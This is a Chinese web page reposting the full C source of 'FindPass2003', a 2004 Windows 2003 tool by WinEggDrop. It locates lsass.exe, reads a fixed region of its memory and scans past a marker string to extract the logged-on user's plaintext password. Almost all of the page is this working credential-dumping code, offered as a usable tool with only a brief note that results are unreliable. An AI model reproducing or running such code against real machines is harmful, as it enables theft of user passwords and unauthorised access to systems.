FindPass2003 Source

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

//********************************************************************************

// Version: V1.0

// Coder: WinEggDrop

// Date Release: 12/15/2004

// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method

// Used Is Pretty Unwise,But This May Be The Only Way To Review The

// Logon User's Password On Windows 2003.

// Test PlatForm: Windows 2003

// Compiled On: VC++ 6.0

//********************************************************************************

#include <stdio.h>

#include <windows.h>

#include <tlhelp32.h>

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char Password[MAX_PATH] = {0}; // Store The Found Password

// Function ProtoType Declaration

//------------------------------------------------------------------------------------------------------

BOOL FindPassword(DWORD PID);

int Search(char *Buffer,const UINT nSize);

DWORD GetLsassPID();

BOOL Is2003();

//------------------------------------------------------------------------------------------------------

// End Of Fucntion ProtoType Declaration

int main()

{

DWORD PID = 0;

printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

if (!Is2003()) // Check Out If The Box Is 2003

{

printf("The Program Can't Only Run On Windows 2003 Platform\n");

return -1;

}

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom

{

return -1;

}

FindPassword(PID); // Find The Password From Lsass.exe Memory

return 0;

}

// End main()

//------------------------------------------------------------------------------------

// Purpose: Search The Memory & Try To Get The Password

// Return Type: int

// Parameters:

// In: char *Buffer --> The Memory Buffer To Search

// Out: const UINT nSize --> The Size Of The Memory Buffer

// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",

// Since The Password Is Near The Above Location,But It's Not Always True That

// We Will Find The Magic String,Or Even We Find It,The Password May Be Located

// At Some Other Place.We Only Look For Luck

//------------------------------------------------------------------------------------

int Search(char *Buffer,const UINT nSize)

{

UINT OffSet = 0;

UINT i = 0;

UINT j = 0 ;

UINT Count = 0;

if (Buffer == NULL)

{

return -1;

}

for (i = 0 ; i < nSize ; i++)

{

/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word

Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate

The Magic String,We Have To Do It Manually And Slowly

*/

if (Buffer[i] == 'L')

{

OffSet = 0;

if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)

{

OffSet += strlen("LocalSystem") + 1;

if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)

{

OffSet += strlen("Remote") + 1;

if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)

{

OffSet += strlen("Procedure") + 1;

if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)

{

i += OffSet;

break;

}

}

}

}

}

}

if (i < nSize)

{

ZeroMemory(Password,sizeof(Password));

for (; i < nSize ; i++)

{

if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)

{

/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In

That Way

*/

j = i + 7;

for (; j < nSize; j += 2)

{

if (Buffer[j] > 0)

{

Password[Count++] = Buffer[j];

}

else

{

break;

}

}

return i + 7; // One Flag To Indicate We Find The Password

}

}

}

return -1; // Well,We Fail To Find The Password,And This Always Happens

}

// End Search

//------------------------------------------------------------------------------------

// Purpose: To Get The Lsass.exe PID

// Return Type: DWORD

// Parameters: None

//------------------------------------------------------------------------------------

DWORD GetLsassPID()

{

HANDLE hProcessSnap;

HANDLE hProcess = NULL;

PROCESSENTRY32 pe32;

DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if( hProcessSnap == INVALID_HANDLE_VALUE )

{

printf("Fail To Create Snap Shot\n");

return 0;

}

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap, &pe32))

{

CloseHandle(hProcessSnap); // Must clean up the snapshot object!

return 0;

}

do

{

if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)

{

PID = pe32.th32ProcessID;

break;

}

}while(Process32Next( hProcessSnap, &pe32));

CloseHandle( hProcessSnap);

return PID;

}

// End GetLsassPID()

//------------------------------------------------------------------------------------

// Purpose: To Find The Password

// Return Type: BOOLEAN

// Parameters:

// In: DWORD PID -> The Lsass.exe's PID

//------------------------------------------------------------------------------------

BOOL FindPassword(DWORD PID)

{

HANDLE hProcess = NULL;

char Buffer[5 * 1024] = {0};

DWORD ByteGet = 0;

int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process

if (hProcess == NULL)

{

printf("Fail To Open Process\n");

return FALSE;

}

if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe

{

printf("Fail To Read Memory\n");

CloseHandle(hProcess);

return FALSE;

}

CloseHandle(hProcess);

Found = Search(Buffer,ByteGet); // Search The Password

if (Found >= 0) // We May Find The Password

{

if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not

{

printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);

}

}

else

{

printf("Fail To Find The Password\n");

}

return TRUE;

}

// End FindPassword

//------------------------------------------------------------------------------------

// Purpose: Check If The Box Is Windows 2003

// Return Type: BOOLEAN

// Parameters: None

//------------------------------------------------------------------------------------

BOOL Is2003()

{

OSVERSIONINFOEX osvi;

BOOL b0sVersionInfoEx;

ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));

osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))

{

osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);

}

return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);

}

// End Is2003()

// End Of File

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航